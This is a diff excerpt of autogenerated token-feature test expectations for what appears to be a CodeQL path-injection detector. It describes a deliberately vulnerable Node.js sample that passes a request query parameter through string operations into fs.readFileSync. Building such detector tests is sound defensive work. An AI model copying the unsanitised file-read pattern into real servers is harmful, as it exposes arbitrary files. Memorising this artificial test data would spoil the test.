unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | exceptional return of fs.read ... /')[0]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | exceptional return of fs.read ... /')[0]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | exceptional return of fs.read ... /')[0]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | exceptional return of fs.read ... /')[0]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | exceptional return of fs.read ... /')[0]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | fs.read ... /')[0]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | fs.read ... /')[0]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | fs.read ... /')[0]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | fs.read ... /')[0]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:36 | fs.read ... /')[0]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:5:21:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:5:21:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:5:21:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:5:21:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:5:21:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | exceptional return of path.split('/') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | exceptional return of path.split('/') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | exceptional return of path.split('/') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | exceptional return of path.split('/') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | exceptional return of path.split('/') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | path.split('/') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | path.split('/') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | path.split('/') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | path.split('/') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:32 | path.split('/') | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:35 | path.split('/')[0] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:35 | path.split('/')[0] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:35 | path.split('/')[0] | calleeImports | fs | @@ -11439,6 +87693,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:35 | path.split('/')[0] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:35 | path.split('/')[0] | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:21:18:21:35 | path.split('/')[0] | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:21:23:21:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:23:21:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:23:21:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:23:21:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:23:21:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:21:29:21:31 | '/' | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:21:29:21:31 | '/' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:21:29:21:31 | '/' | calleeImports | url | @@ -11448,6 +87707,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:21:29:21:31 | '/' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:21:29:21:31 | '/' | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:21:29:21:31 | '/' | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:21:34:21:34 | 0 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:34:21:34 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:34:21:34 | 0 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:21:34:21:34 | 0 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:21:34:21:34 | 0 | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | exceptional return of fs.read ... /')[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | exceptional return of fs.read ... /')[i]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | exceptional return of fs.read ... /')[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | exceptional return of fs.read ... /')[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | exceptional return of fs.read ... /')[i]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | fs.read ... /')[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | fs.read ... /')[i]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | fs.read ... /')[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | fs.read ... /')[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:2:22:36 | fs.read ... /')[i]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:5:22:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:5:22:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:5:22:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:5:22:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:5:22:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | exceptional return of path.split('/') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | exceptional return of path.split('/') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | exceptional return of path.split('/') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | exceptional return of path.split('/') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | exceptional return of path.split('/') | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | path.split('/') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | path.split('/') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | path.split('/') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | path.split('/') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:32 | path.split('/') | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | calleeImports | fs | @@ -11457,6 +87766,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:22:23:22:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:23:22:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:23:22:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:23:22:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:23:22:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:22:29:22:31 | '/' | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:22:29:22:31 | '/' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:22:29:22:31 | '/' | calleeImports | url | @@ -11466,6 +87780,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:22:29:22:31 | '/' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:22:29:22:31 | '/' | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:22:29:22:31 | '/' | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:22:34:22:34 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:22:34:22:34 | i | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:22:34:22:34 | i | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:22:34:22:34 | i | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:22:34:22:34 | i | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | exceptional return of fs.read ... //)[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | exceptional return of fs.read ... //)[i]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | exceptional return of fs.read ... //)[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | exceptional return of fs.read ... //)[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | exceptional return of fs.read ... //)[i]) | fileImports | fs http url | +| 